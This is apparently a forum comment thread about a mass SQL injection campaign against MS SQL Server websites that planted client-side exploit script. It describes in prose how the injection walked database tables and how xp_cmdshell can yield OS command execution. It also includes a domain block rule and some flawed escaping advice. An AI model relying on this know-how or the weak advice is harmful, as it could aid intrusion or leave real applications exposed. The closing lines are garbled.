you would never use a car without knowing how to drive

I don't know. Have you seen some of the drivers on the road?

But yes, I agree. You should not operate a vehicle without knowing how to use it. And, just because you own a sports car, does not make you a professional drive.

I would like to see computer users with more knowledge and more security awareness. However, it is easy to throw some HTML/ASP/whatever on to a website. How can we let novice users create "secure" sites without banning them the web?

Re:SQL injection

[Fizzl]

sql injection to gain root

I will gnaw my leg of if this dribble gets modded up.

Re:SQL injection

[pedestrian+crossing]

sql injection to gain root

I will gnaw my leg of if this dribble gets modded up.

So far, so good, it's still at 1.

I am astounded at the (much more than usual) level of misunderstanding of how the attack works. I've seen one correct comment, and much blathering idiocy!

Running LAMP might protect you from this particular attack only because it is looking for table/column information the MS-SQL way. If you aren't taking effective steps to prevent SQL injection (which has nothing to do with "gaining root"), only luck is keeping it from happening to your LAMP system.

Re:SQL injection

Your leg of what?

Re:SQL injection

[stranger_to_himself]

I would like to see computer users with more knowledge and more security awareness. However, it is easy to throw some HTML/ASP/whatever on to a website. How can we let novice users create "secure" sites without banning them the web?

You've hit exactly on the real problem. I'm a sort of hobbyist web developer with no real training. I can hack together websites using ASP.Net and SQL server that work (that is do what they're supposed to do), but I have no idea how write secure websites. I don't even understand the sorts of attacks I should be expecting. Furthermore, the 'my first website' books I learnt from don't really cover this sort of stuff except in passing, and learning about security is frankly boring.

Sadly I don't have a solution, and I don't think there is one. Thinking along a public health analogy, advocating 'safe web programming' is difficult because its far less fun, and advocating abstainance for those who aren't qualified isn't going to work because, well you know what kids are like. Enforcing a ban is culturally unacceptable and impossible in any case.

Re:SQL injection

[mhall119]

I guess for the next generation of pc users, we need to educate them. I always said owning a computer is like ownign a car, you would never use a car without knowing how to drive, although you did buy the car. Even more important, I think, is to educate the next generation of programmers. Just because you know how to make a car, doesn't mean you know how to make a safe car. Even if you are an expert driver, you really have no way of knowing if taking a specific car over 75 mph will cause a critical joint in the engine to fail. Saying that drivers should never drive any car above 75 mph to avoid that possibility isn't an acceptable solution.

Re:SQL injection

[eakerin]

Amusingly, with the set of services used in this exploit, it's possible to gain "root" access if the user the webapp is connecting to the database with has the SA role on the SQL server.

On a Microsoft SQL server, there's a system stored procedure called xp_cmdshell, this allows you to run arbitrary commands under the permissions of the account the database is running under. And because Microsoft requires the user running SQL server to be a local administrator for the service to start, you have gained "root" access.

You have to be an SA to do run this command (there are ways to give other access), so it's slightly limited. Although, I would be surprised if none of the affected machines webapps weren't connecting as sa...

Re:SQL injection

[SoupGuru]

You realize some might see this as a challenge? Wait, now that I responded, I can't mod that post up?!

Re:SQL injection

[graveyhead]

The solution is to use a higher level framework that will handle most of the security issues for you. My preference is Drupal which formulates db queries like this:

    $r = db_query('SELECT * FROM {foo} WHERE a=%d AND b="%s"', $a, $b);

In this example, $a is converted to an integer (because of the %d) even if it came through CGI as a user request. $b is sanitized and will not allow the type of SQL injection that this article talks about (because of the %s). No worries about any security issues as long as you use the function as intended.

Not to mention that frameworks like Drupal have lots of other great features to help you build your site quickly.

Enjoy!

Re:SQL injection

[Kalriath]

I just tried this, as SA on my own SQL server (using out of the box config):

Msg 15281, Level 16, State 1, Procedure xp_cmdshell, Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online

I don't see how your scenario is possible at all.

Re:SQL injection

[plover]

Do you know why that error message was numbered as "Msg 15281" and not "Msg 6"? Because the hole wasn't plugged for many, many years. Prior to that all of the extended stored procedures were 100% visible to the SA account.

The default installation of MSDE or MSSQL 2000 creates an SA account with an empty password, and is installed as an NT service with local admin rights.

From this you can determine that everyone who installs an MSDE-based product (the Office 2000 suite, especially Visio) creates a built-in admin exploit. There are likely still thousands of these installations out there.

Re:SQL injection

[Allador]

Nearly every item in your post is wrong.

Amusingly, with the set of services used in this exploit, it's possible to gain "root" access if the user the webapp is connecting to the database with has the SA role on the SQL server. At most, this would give you sa on the db server, which is not the same thing as root on the OS.

On a Microsoft SQL server, there's a system stored procedure called xp_cmdshell, this allows you to run arbitrary commands under the permissions of the account the database is running under. xp_cmdshell is disabled by default.

And because Microsoft requires the user running SQL server to be a local administrator for the service to start, you have gained "root" access. I have no idea where you get this from. There has never been a version of SQL Server that requires the db service account to be a local admin for the db server to run.

The account that SQL Server runs as defaults to 'Local Service' nowadays. And the only special priv it needs is the privilege of 'start as service'.

In fact, its common practice to have your mssql server run as a local (non-domain) account, that has no privs, and is named 'SQLServer'.

In addition, MS SQL server by default doesnt even have an SA account, it runs in windows security mode, rather than mixed mode. And standard practice is to use a non-priv'd account for the webapp that only has data-read and data-write rights to one db for the webapp.

Re:SQL injection

[eakerin]

Yes, xp_cmdshell is disabled by default in SQL 2005, but do you seriously think every site is running SQL 2005 on their servers?

Now, on the SQL being a local administrator. In researching this one to show you where it says it, Microsoft seems to have change their guidelines since I last looked them up (and good for them, I'm gonna start pushing the new guidelines at work to the DBA team)

Years before, with SQL 2000 (And pretty much every bit of what I said applied to SQL 2000), Microsoft said you had to have setup the SQL service account as a local administrator on the machine. There are still some remnants of this policy: http://support.microsoft.com/kb/239885 Where it's explicitly said to make sure the user is a local administrator (NT4, SQL 2000 and SQL 7).

Now, Microsoft says "If you don't want the SQL service account to be a member of the local administrators group" (and they do recommend against it as well, but how many lazy admins are gonna do that...) You merely have to grant the account the following rights:
Act as Part of the Operating System = SeTcbPrivilege
        Bypass Traverse Checking = SeChangeNotify
        Lock Pages In Memory = SeLockMemory
        Log on as a Batch Job = SeBatchLogonRight
        Log on as a Service = SeServiceLogonRight
        Replace a Process Level Token = SeAssignPrimaryTokenPrivilege
And make sure the file system and registry permissions are granted to your service account user.

Yes, MSSQL installs by default with only windows security mode enabled. So you have a few options for connecting your application to the DB:
1. Add the user the web app runs under to the SQL server, and used integrated security.
2. Turn on SQL security, and create a user for the application to use.
3. (seriously, I've seen this in my travels) Setup a COM+ component that does database access, running under the same account as the SQL server, so they "don't have to worry about permission problems"

I've seen programmers do all three in my time, depending on what they are more comfortable with. Sometimes, I see them just use the magical SA account, to login to the database. Again, having a proper DBA would prevent stupid things like this, but not every place has a proper DBA (or a person that can truly act like one part time)

I've seen all sorts of stupid things, including most of the above, some by admins that should know better, some by admins that have very little clue what a database is, and just "need to get this app working" Some were recommendations by the vendor of a product at the time of install. Many of these practices have gotten better over the years, but some have not.

Now, if you have only ever dealt with SQL 2005 (which is MUCH more secure by default, but still prone to admins and programmers doing stupid things, and no one can prevent that) Then yea, most of the stuff I said does not
apply.

Yea, you can probably set enough permissions to not require local admin rights, but seriously, the places we're talking about already are too lazy to sanitize database inputs, do you really thing all of their practices are top-notch security wise?

And so concludes another episode of "Hey, with how lazy some people are, I could see if happen."

Re:SQL injection

[Allador]

Fair enough, there still may be some sql 2000 servers out there, but there shouldnt be many left. SQL 2000 goes out of mainstream support from MS in 3 months.

In addition, many of the defaults and published guidelines on this stuff changed after slammer went around, in 2003. So thats been 5 years people have had to clean up their messes and adopt best practices.

In my world, we moved over to a 'best-practices' installations of IIS and SQL Server when we migrated to sql server 2000, which was the best part of 7 years ago.

Yea, you can probably set enough permissions to not require local admin rights, but seriously, the places we're talking about already are too lazy to sanitize database inputs, do you really thing all of their practices are top-notch security wise? You dont have to do any work for this. Just tell the installer what service account you're using, and it grants all the privs and ntfs/registry acls you need.

Years before, with SQL 2000 (And pretty much every bit of what I said applied to SQL 2000), Microsoft said you had to have setup the SQL service account as a local administrator on the machine. There are still some remnants of this policy: http://support.microsoft.com/kb/239885 Where it's explicitly said to make sure the user is a local administrator (NT4, SQL 2000 and SQL 7). Note that in that link, it says that the ms sql 2000 service account has to be a local admin ONLY on NT4.

Considering how long its been (years) since the current version of sql server released, and considering how much longer (even more years) the best practices were published for the previous version, I think its reasonable to focus on the current version.

If you look at 5 years old versions of products in any space right now, the products look alot crappier. Especially in the MS world, everything has changed since then.

this kinda of crap anin't gonna stop until:

[Grampaw+Willie]

this kind of crap ain't gonna stop until we have a fundamental change in our approach to security: and that is we use a WHITELIST to authorize execution of the programs we trust and exclude EVERYTHING else.

trying to identify and exclude malware has fallen short of meeting our needs

and that demonstration continues week after week after week after week as the hacking gets worse and worse

if we are going to use the internet for business purposes this is UNACCEPTABLE. Change has to happen.

NO SIGNATURE? NO EXECUTE.

Re:this kinda of crap anin't gonna stop until:

[Antique+Geekmeister]

That's right. Just make sure it has a GPL or possibly an Apache license, and your security status will improve quite a bit.

Re:this kinda of crap anin't gonna stop until:

Hypothetical signed program checklist:

* SQL server: SIGNED
* Web server: SIGNED

Well, in this case you are still vulnerable to an SQL injection attack...

Re:this kinda of crap anin't gonna stop until:

[lhorn]

A whitelist wouldn't stop this, MsSQL would run, being on it...
If the whitelist specified that MsSQL was not allowed to load and execute code from links in data, perhaps that will do it.
Separation of code and data would fix the situation. I for one would be able to live with the reduced functionality.

Re:this kinda of crap anin't gonna stop until:

[geminidomino]

NO SIGNATURE? NO EXECUTE. NO GO.

Who is going to sign these apps that are "legit"? Microsoft? The goobermint? Another godsawful clusterfuck a la Verisign?

No thank you. Better that moronic admins get thier charges hacked up than we can't run our *NIX boxen because one of the above collection of scumbags won't sign source-built copies of Apache. (Sometimes the defaults aren't good enough)

Re:this kinda of crap anin't gonna stop until:

[Bert64]

People should be browsing the web from appliances anyway, not full blown computers...
If you build a small unix box where the only areas the user can write to are mounted noexec, and all executable areas are read only it becomes much harder to get malware on the system, even with a clueless user.
The only way you could execute something is by exploiting one of the client apps, and that would still have to further acquire root privileges in order to do any major damage or make itself survive a restart.
For updates you could have a special "maintenance mode", which requires flipping a physical switch to activate.
Sure, users would lose a lot of the freedom they currently have over their machines, but consider that...
The users who get infected are usually the technically illiterate ones, who only use their machines for a very limited subset of activities.
The users who actually take advantage of the ability to install/execute arbitrary apps are clued up enough to actually do so, and subsequently usually aware of the dangers of malware and far less likely to leave their machine in an insecure state, or to fall for a social engineering scam.

Re:this kinda of crap anin't gonna stop until:

[Dancindan84]

Actually it would stop if windows didn't still follow the "EVERYTHING runs as root" philosophy.

Both the server hack (using SQL injection) and the client hack (using browser scripting to exploit a Realplayer vulnerability) SHOULD NOT have access to do things outside of their intended purpose. Is it still possible SQL injection would do damage including loss if information? Yes. Is it still possible a browser script could screw up your browser or something similar? Yes. But gaining control of the machine wouldn't be an issue.

Re:this kinda of crap anin't gonna stop until:

This crap isn't going to change until ALL developers do one simple thing:

1. SANITIZE YOUR FUCKING INPUTS

Otherwise it will continue. It's purely a developer issue. The other solutions, at least for the server-side of this hack, show a deep and scary misunderstanding even amongst the "technical" crowd.

1. Signing your SQL statements isn't going to help, or if it does, would be cost (time)-prohibitive. It'd take far less time to sanitize your inputs than it would defining that your SQL statement should contain exactly 1 SELECT statement, 2 JOINs, 0 sub-selects, etc.

2. Executing DB code under only a specialized, locked down account isn't the issue -- in SQL injection, the injected SQL code will always run as the same user that the rest of that page / application is running.

The ONLY time-proven defense against SQL injection is to SANITIZE INPUTS. Really, it's not rocket science. If variable X is going to be used in some sort of SQL command anywhere, then you need to ensure that variable X is the correct data type you're expecting, and if X is a string, then any instances of SQL string delimiters (', ", etc) in variable X are escaped. Don't rely on mod_security to do this. Don't rely on magic quotes (ugh) to do this. Do it YOURSELF, and do it every time you get an input that's database-bound. If you're a developer, you should already be doing this, or shame on you. If you're a network engineer, database admin, or some other non-code touching IT employee, then you should make sure there's policies in place for doing so, and that they're being followed.

Re:this kinda of crap anin't gonna stop until:

[element-o.p.]

Huh. Kinda sounds like...:

#!/usr/bin/perl -Tw
use strict;
...

That's one of the big reasons I like Perl so much :)

Re:this kinda of crap anin't gonna stop until:

[geekoid]

This specific kind of attack can only be prevented with proper coding techniques. It's 1 or two simple lines of code somebody didn't put in. Not just an amateur mistake, but sloppy as well.

Re:this kinda of crap anin't gonna stop until:

[Allador]

This entire attack works unchanged if the sqlserver and iis are running (as is the standard nowadays) as non-admin. It even works if the db account the webserver uses isnt sa on the sql server.

In short, this is a very creative attack. Stopping the sql injection would eliminate it. Without that, you're limited to doing everyting in sprocs and using heavy xss protection on db writing of content to the webpages.

This entire attack, from beginning to end, at no point requires privileged access to anything.

Protect yourself with AdBlock

[Yaztromo]

Add this simple rule:

http://*.uc8010.com/*

Yaz.

Re:Protect yourself with AdBlock

[pdwalker]

Use OpenDNS http://www.opendns.comas your DNS provider, make an account and take advantage of their domain blocking facility.

It's free

The aim of the hack

[Erik+Hensema]

Does anybody know the aim of the hack? Starting last saturday we saw a huge surge in incoming spam, with a peak yesterday (monday) at about 25 to 30% more spam than ever before. Today we see a lot less spam, almost at normal levels (normal being around 80-90% of all mail is spam :-S )

Re:The aim of the hack

[theonlyaether]

I can't say anything about last Saturday, but starting Christmas eve late we started getting hit hard with the new storm botnet worm...I now have a huge firewall blacklist of what appeared to be infected machines, and haven't noticed if things went back to normal yet or not due to the fact that they're gonna have to give me a damn good reason to unblock them... Either way, a lot has been going on lately.

Re:The aim of the hack

[LiquidCoooled]

AV firms came back to work yesterday ;)
They had a 2 week holiday.

Re:The aim of the hack

[ladadadada]

One of the sites we saw infected was redirecting users to a porn website after attempting to infect them with the malware. This suggests to me that they are trying to snatch as much money as they can very quickly before everyone gets back from the holidays and starts removing the injected code. They haven't been particularly quiet about this infection so I can only assume that they meant for this to infect a large number of people quickly and then be done with it.

I don't know yet what the malware does but from what we could see of it, all it does is download another piece of malware which suggests to me that the process is probably quite versatile. The second piece could be changed on the server to meet their needs or it could download further bits of malware. I have a strong suspicion that one of the functions it can perform is to continue the attacks on other websites. That would seem to be the fastest way to spread.

Based on the timing of the attack (just as everyone goes on holiday... sysadmins are at home, home users are on the web looking for the present they really wanted but didn't get this year) I'd also suspect it would be looking for credit card purchases and forwarding the numbers back to the owners of the botnet.

That is one impressive hack.

[AltGrendel]

Shame about this:

The fourth interesting point is that the only exploit we were able to coax out of them was the venerable MS06-014 (MDAC) patched in September 2006. What this means is that they went to the trouble of preparing a good website exploit, and a good mass-hack, but then used a mouldy old client exploit. It's almost a dichotomy.

The only thing I can figure is that either

• a) this was only a test

• b) they are hoping to catch unpatched systems.

It must be horrible

[theonlyaether]

for people running MS servers to keep their systems patched. I mean...this is an old ass exploit. Are people really that afraid of their Windoze servers loosing stability that they don't even apply security updates?

Re:It must be horrible

[revlayle]

SQL Injection!!!! *ANY* SQL-based database is prone to it, if the front-end code that access the database is poorly written.

I don't know HOW many PHP-based websites were vunerable to SQL Injection with a backend of MySQL or even Oracle!

Re:It must be horrible

[Allador]

there was no unpatched vulnerability used to own the webserver.

Standard plain-vanilla, no-unpatched-vuln-needed was used to run commands on the db, which was used to inject script to CLOB fields that were output to dynamic web pages.

IE browsers that then browsed those websites hit that script, which exploited the MDAC vuln on desktop machines, to steal stuff on desktops.

Must...not...make...joke...

[Notquitecajun]

Willnotmakewindowsupdatejoke....willnotmakewindowsupdatejoke...

NoScript

[j.sanchez1]

Wouldn't NoScript protect the Firefox users out there?

Re:NoScript

[GNUALMAFUERTE]

Back in time we got the problem of /.ers not reading the article, and posting off topic comments.
Now we have the problem of /.ers that can't tell apart a browser from a webserver, either because their lack of knowledge, in most cases because their IQ is lower than their body temperature, but come on! We are talking about an SQL injection attack, the purpose is obviously to compromise fucking webservers, not the end loser, what the fuck does a firefox extension you have on YOUR stupid machine does to prevent an attacker to perform an sql injection in a website? The internet revolves around your or something?

Don't think too hard, you may forget to fucking breed.

Re:NoScript

[geminidomino]

How's that foot taste, you twat? If you'd RTFA, you'd see that the exploit added scripts to *malware sites* to the affected sites. GP was talking about the users of those sites being protected from the malware.

PLEASE forget to breed, in the name of evolution.

Re:NoScript

[Gori]

Dude, from the FA : ...others continue to serve visitors a malicious script that tries to hijack their PCs using multiple exploits...

and ...The sites [were] hacked by hacking robot by means of a SQL injection attack, which executes an iterative SQL loop [that] finds every normal table in the database by looking in the sysobjects table and *then appends every text column with the harmful script*...

So yes, the parent is probably right. If you block javascript, you are not affected by the compromised server...

Re:NoScript

[IsThisNickTaken]

Although the grandparent didn't say it, wouldn't his comment apply to the following part of the summary?

others continue to serve visitors a malicious script that tries to hijack their PCs using multiple exploits, security experts said this weekend

Re:NoScript

[GNUALMAFUERTE]

Or by any other server that serves "malicious" javascript. If there is some "malicious" javascript that your browser is vulnerable too, then you should fix your browser. This article doesn't address that situation. It addresses an SQL injection attack, after they got access, they can add javascript code to the page as well as serving goatse images.

Re:NoScript

[a_claudiu]

If it's installed on the server instead of MSSQL.

Re:NoScript

You had some bi-polar outbreak? That was some horrible shit you spewed, and the least you could do is an authentic retraction, if not apology. Take a break, deep breath...hope you aren't beating your dog/kid/wife!

Good acts of violence

[MosesJones]

Reading the referenced article it seems to almost applaud the success of the attack. This isn't a "good" attack its a very bad attack in that it has been successful and could potentially inflict damage on thousands or even millions of users. Its like claiming that something was a very "good" fraud because it robbed thousands of old folks of their life savings.

Its a bad attack, its bad that its been successful and the people who did it are scum. These aren't some rebels fighting against the system they are criminal scum who are aiming to inflict damage on large numbers of people. Remember all those times when you have to clean up your parents/in-law/friends computers because they get compromised by this crap? Well the scum behind this have just given you a whole lot more time doing crappy boring work.

Re:Good acts of violence

[AdrocK]

I think everyone agrees that this sort of thing is "bad". I wouldn't call it violence, but criminal nonetheless.

But I also think slashdotters are amused at the continued running-amok of MS products. When the school bully gets beat up, you tend to not feel as sorry for him as you do for your friend.

Besides, cleaning up the spyware keeps the fly-by-night pc repair geeks in business

Re:Good acts of violence

[zaydana]

But what about when you have to clean up a nice girl's computer?

I say congrats to the guys who made this, and keep up the good work!

Re:Good acts of violence

[Chabil+Ha']

When the school bully gets beat up, you tend to not feel as sorry for him as you do for your friend. I don't think it's the school bully getting much of a black eye, but those that trust him to protect them when they use his services, even if 'Friends don't let friends use M$ products'.

Re:Good acts of violence

[Corporate+Troll]

In the twenty years I have actively used computers, that got me laid just once. I don't think the effort is worth the reward. (Meaning: it's way too unlikely to get laid that way)

Re:Good acts of violence

[Tablizer]

"In the twenty years I have actively used computers, that got me laid just once. I don't think the effort is worth the reward. (Meaning: it's way too unlikely to get laid that way)"

Hey, that's a high rate for slashdotters.

Re:Good acts of violence

[quincunx55555]

That reminds me of when I hear someone ask, "How's your cold?" and the reply is, "It's getting better." Well, heck, if the cold is getting better, than that means the person is feeling worse!

You should still be careful.

[AltGrendel]

"It's possible that only Microsoft SQL Server databases were hacked with this particular version of the robot since the script relies on the sysobjects table that this database contains."

Doesn't mean that the 'bot can't be tweaked. I think that someone is using this as proof of concept.

Re:You should still be careful.

[a_claudiu]

Tweaking a Windows virus into a Unix one is like tweaking a Ford Fiesta into an Abrams tank.

Re:You should still be careful.

The server-side exploit is not binary code. It is a SQL injection attack. The only thing that ties it to MS SQL Server is the fact that they decided to use the sysobjects table to locate other tables. They could have just as easily used the ANSI-compliant INFORMATION_SCHEMA.TABLES view, which is available in most databases including MS SQL, MySQL, Postgres, Oracle, DB2, etc.. From there they could have used ANSI standard SQL to push their updates into the database containing their malicious javascript.

This exploit did not require compromising the web server, or the database server. It required compromising the programming of the web application. Such an attack would work similarly on any combination of web server and database server, if it had been so designed.

As for the client exploit, yes that would have been tougher. They did rely on a specific ActiveX exploit to compromise the clients. But they could have just as easily use poorly written Apache/PGSQL sites to push that malicious script.

Re:You should still be careful.

[Lars+T.]

Tweaking a Windows virus into a Unix one is like tweaking a Ford Fiesta into an Abrams tank. Which, I might add, is not the same as the much easeier "tweaking a Ford Fiesta under an Abrams tank".

Re:You should still be careful.

That would depend on whether you're tweaking the Fiesta under it, or are tweaking the Abrams above...

Re:You should still be careful.

[upside]

Of course it can be "tweaked" - if there is a vulnerability in a web application or an Internet-accessible service. Like the grandparent, for a moment I was worried there was a vulnerability in the LA[M|P]P stack or a particular CMS. Not so. In this case it was a vulnerability in Microsoft MDAC. It's pretty trivial to exploit old vulnerabilities, so the main newsworthy part here is that there are so many unpatched systems.

Re:You should still be careful.

[mhall119]

Only this isn't a Windows virus, it's an SQL injection attack. Most likely the vulnerability isn't even in Microsoft code, but in some popular business web application that uses MS SQL for the backend. Tweaking that to exploit a PHP application that uses MySQL for the backend wouldn't be any more difficult.

Re:You should still be careful.

[a_claudiu]

If it's just an SQL injection atack without affecting the webserver how do you insert Javascript into a web page automatically? The database structure will be different for different sites and the robot should be very smart to find the tables/fields that are displayed directly on the page, unless is affecting only some defined frameworks.

Re:You should still be careful.

[a_claudiu]

I found in TFA that is appending the script to all text field.

Thompson claimed that Grisoft's LinkScanner Pro tool indicated that nearly all had actually been scrubbed. "I found that really surprising [that they were cleaned so quickly],"

No surprise here. Most applications will be probably broken after inserting some data to all text fields and somebody eventually will fix the broken websites.

Re:You should still be careful.

[manifoldronin]

This exploit did not require compromising the web server, or the database server. It required compromising the programming of the web application.

The above should have been "this exploit did not require compromising the web server, or the database server. It required compromising the programming of the web application by the idiots who wrote the application."

Just so it's clear. :-)

Re:You should still be careful.

[toadlife]

I admire, your and others' attempts to inform the masses on the real issue here, but the ignorant masses are are out in force on this one and this giant anti-Microsoft circle jerk will not be stopped.

Re:You should still be careful.

[Locutus]

it would really help if someone had said what application was exploited. I guess I need to go the google and search for all the infected sites and look to see what application was hacked. One would think that this would have been more upfront in any article about his since as was rightfully pointed out, just because the attack was targetting the MS SQL Server, the application is what allowed the use/infection of the database.

So, what application or framework contains the real flaw here is why is it not getting mentioned?

LoB

Re:You should still be careful.

[Kalriath]

Except that you didn't even read the article! The vulnerability in MDAC is the client side javascript exploit which was injected into the text fields - we still don't know what was exploited in order to inject it into the database.

dumb or troll ?

[erlehmann]

the problem is nothing that has to do with signed code. signing code "only" authenticates it and does not say that there are no security holes.

it has, however, something to do with specific precations not being taken: with selinux or apparmor for example this probably wouldn't have happended simply because they handle application privileges in a different (OMHO: better) way - through profiles.

Re:dumb or troll ?

[Rich0]

Uh - this attack didn't involve the execution of any "code" - at least nothing that selinux/etc would recognize as such. SQL Server was hit exclusively not because of any particular vulnerability - but because the attack used syntax specific to that server only.

This is an SQL injection attack. That is when a poorly-written application does not sanitize its input, and passes it onto a database server as part of a SQL script. The malicious input terminates the command the application was running and starts some other command running. It has no access to anything in the system other than the data in the database - which is all this attack compromised. However, that data in tht database was then used by the application to render html output, which then passed the exploit scripts onto web clients.

This is analogous to a trojan that wipes out all of a user's files in ~ in unix. Simply running as non-root will do nothing to prevent it from working - the user has access to delete their own files already.

The attack merely used the applications write-access to its own database to modify the database contents - something that is nearly impossible to automatically protect against at the database server level. However, almost all database servers (including SQL Server I'm sure) does offer a semi-manual form of protection - a parametized query. If you prepare a query and put parameters in it, and then pass on user-input data in the parameters, the server will refuse to use the user-input data as anything other than data. Application authors just need to use this feature...

Re:dumb or troll ?

[lrohrer]

Not at all impossible to prevent!

Webserver user should only have read access to only the tables required. Writes should always go through stored procedures. The SP has write access but not the user. The SP must also do a second (or third) scrubbing of the data.

It can also make sense to have to databases. One that serves the web pages and another that handles updates.

Re:dumb or troll ?

[hypersql]

all database servers (including SQL Server I'm sure) does offer a semi-manual form of protection ... prepare a query and put parameters in it ... Application authors just need to use this feature... Developers just don't do that always, because they forget it (or ignore the problem). There is a solution: force the usage of parameters. So far only one database supports this feature: the H2 Database Engine. For more information, see: URL:http://www.h2database.com/html/advanced.html#sql_injection

Re:dumb or troll ?

[egosum]

Exactly. Mod parent up.

Re:dumb or troll ?

[Random+Walk]

Application authors should sanitize not only user input, but also the data they get from the database. This would go a long way towards making the web server resistant against web application vulnerabilities: if you exploit a vulnerability, you get the UID of the webserver. This UID actually does not need to own anything, or have write permissions on anything, except log files and application databases. I.e. with proper file permissions, you could do not much more than writing to the database, circumventing the input sanitation performed by the application. But if the app sanitizes the data it gets from the database, you still loose.

Re:dumb or troll ?

[odourpreventer]

> This is an SQL injection attack.

So, am I correct in thinking a simple AddSlashes() addition to the server side script will prevent this? Other posts imply (heavily) that it's not as simple as that, but when I read "SQL injection attack" I think "AddSlashes()".

Re:dumb or troll ?

[mabu]

>So, am I correct in thinking a simple AddSlashes() addition to the server side script will prevent this? Other posts imply (heavily) that it's not as simple as that, but when I read "SQL injection attack" I think "AddSlashes()".

It depends upon the application. But yes, you're generally right.

This mess is the result of crappy programmers who don't sanitize their input. For example in PHP, a basic requirement would be to use stripslashes/addslashes and strip_tags.

There are a lot of bad programmers out there. That's what this means. I honestly don't really mind exploits like this because it exposes who needs to be fired or change careers.

Re:dumb or troll ?

[Antibozo]

when I read "SQL injection attack" I think "AddSlashes()"

A better approach is to use parameterized prepared statements. Attempting to escape strings is prone to error, since sometimes you need them escaped and sometimes you need them unescaped and it's easy to use the wrong version. Parameters to prepared statements are handled internally by the RBDMS client library so there is structurally no way for interpolated content to break context.

The only time this is difficult is when you need to form a complex query with structure that depends on what parameters were supplied by the client (e.g. adding a constraint for each of a number of optional form fields).

Re:dumb or troll ?

[Mister+Whirly]

Just a shot in the dark, but I am guessing you are the author of the database you are pimping here??

Re:dumb or troll ?

[burnin1965]

It has no access to anything in the system other than the data in the database - which is all this attack compromised. ... The attack merely used the applications write-access to its own database to modify the database contents - something that is nearly impossible to automatically protect against at the database server level.

Good post, but I have to disagree with you here.

While it is possible to mitigate the potential for SQL based attacks through good coding practices there is one major fault in the design of many web applications, a single database user with complete control over the database and utilized for all application queries and the database user credentials are stored in plain text in a configuration file.

And there is a way out. The simplest method would be to use a database user with restricted permissions for the application, only the permissions needed to perform the operations required by the application. But you can take it even further as I have been attempting to do in a PHP project I started, and now for a shameless plug ;).

In PHP girder I utilize multiple database users with varying levels of permissions on the database. There is one database user with credentials stored in plain text in a configuration file, however, this user has only select permissions on a single table in the database. All the other users with higher privileges are stored in SSL encrypted records in the database.

I believe something like this can be used to mitigate the potential for a mistake in application code.

Re:dumb or troll ?

[Rich0]

How is trusting the stored procedure to scrub data any different from trusting the application to do it? The only advantage I can see to this technique is that you put all your writing routines into one place where they might be easier to audit. But if you end up with a ton of procedures I don't think this will continue to be an advantage.

Re:dumb or troll ?

[Rich0]

Well, you're obfuscating the credentials which probably would help to defeat an automated attack (unless of course your software becomes common - in which case the exploit would know where to find everything it needs). You still have the credentials accessible to the webserver - they're just encrypted now. The decryption keys must also be accessible to the webserver - so the hacker has everything they need at hand. Reminds me of DRM...

Re:dumb or troll ?

[burnin1965]

you're obfuscating the credentials

No, I'm encrypting them.

You still have the credentials accessible to the webserver

The encrypted records are accessible to the webserver, but the webserver is missing all the required components to complete the decryption. The users hold the missing component which enables decryption.

the hacker has everything they need at hand. Reminds me of DRM

Nope, wrong answer. If you are interested in how it works you can read the documentation but I assure you, if a hacker were able to query the entire contents of the table which is accessible by the one available database user they would require either brute force password cracking of the SSL keys or they would have to crack the SSL encryption. Without the user's password it is hopeless, even if they managed to read the contents of every table in the database and every file on the server it still would not be enough.

And I agree on the DRM, its pointless, how can you rely on encryption to protect copying of the data when you also provide all the keys and credentials to decrypt the content. Ludicrous, but again, that's not what I'm doing.

Re:dumb or troll ?

[Rich0]

Ok, if you log into the database using end-user-supplied credentials then I agree that you're safe.

However, this will only work for certain types of sites. A store, for example, probably wouldn't want to use per-user credentials to create entries in the items-to-ship-out table. However, individual purchases would trigger a write to this table. And if they did then the hacker could just register an account and use their own credentials. You could use other tricks though - like having users write to some table that is polled by a separate system. However, you still need to scrub your data regardless...

Re:dumb or troll ?

[burnin1965]

if you log into the database using end-user-supplied credentials then I agree that you're safe

This is close to what the design does, but rather than logging into the database with user supplied credentials the user's credentials are utilized to supply the missing passphrase required for decryption of the actual database user credentials required to access the portions of the database they've been given priviledges to access. This way the database entries are not based on per user credentials but rather on a few database user credentials to which they have been provided access through their SSL key.

And if they did then the hacker could just register an account and use their own credentials. You could use other tricks though - like having users write to some table that is polled by a separate system. However, you still need to scrub your data regardless...

Yes, and therein lies the weakness. I currently have four priviledge levels based on four seperate database users, depending on the priviledges you grant to each user by giving them an encrypted key they will have that level of database access. The more trusted a user is the higher their level of access and the greater the risk. But simply registering would not provide enough access to do any damage, a basic registered user still only has select permissions, no insert, update, or delete permissions.

And yes, you still need to scrub your data, I'm not proposing a solution to crummy coding, just a way to mitigate potential damage. And I believe this method would eliminate a google/worm type exploit as you would need an authorized account on any site using this design before you could actually do anything. It would not be possible to simply do a google search for sites using the code and automatically perform a damaging sql inject as the lowest level of user can only perform selects on a single table.

Re:dumb or troll ?

[Kalriath]

Not in this case, no. MSSQL Server doesn't escape apostrophes with slashes, it escapes them with a second apostrophe. A hackish approach on the SQL Server platform is to replace("'", "''"). Parameterised is of course waaaaaaaaaaaay better.

Re:dumb or troll ?

[Allador]

So far only one database supports this feature: the H2 Database Engine. ROFL

I think what you mean to say is that there may still nowadays be one database server out there that does NOT support this feature. I cant think of it though.

Re:dumb or troll ?

[hypersql]

> you are the author of the database you are pimping here?
Yes. Sorry I should have said that in the post.

Re:dumb or troll ?

[hypersql]

> ROFL
Why is that funny? If all database engines would support this feature, the world would be safer! ... and I would be rich because I invented it? No: it is not patented.

Re:dumb or troll ?

[Allador]

It's funny because of your statement that your database is the only one that supports parameterized queries.

Every db on the planet supports parameterized queries, I cant think of one that doesnt.

To be more specific, nearly every db access technology (ado, jdo, jdbc, pdo, etc) supports such things.

If you've got a good product, there's nothing wrong with advertising it, but to make such obviously false statements as that its the only one that supports parameterized queries is a bit silly.

Re:dumb or troll ?

[hypersql]

There is a missunderstanding.

> your statement that your database is the only one that supports parameterized queries

I didn't write that. I wrote: "force the usage of parameters". Probably I should have written "enforce using parameters". 'Enforce using parameters' and 'support parameters' is not the same. H2 is the only database that can enforce using parameters.

You jFail It

salews andQ so on, bought the farm....

well then it ain't gonna stop

[tigre]

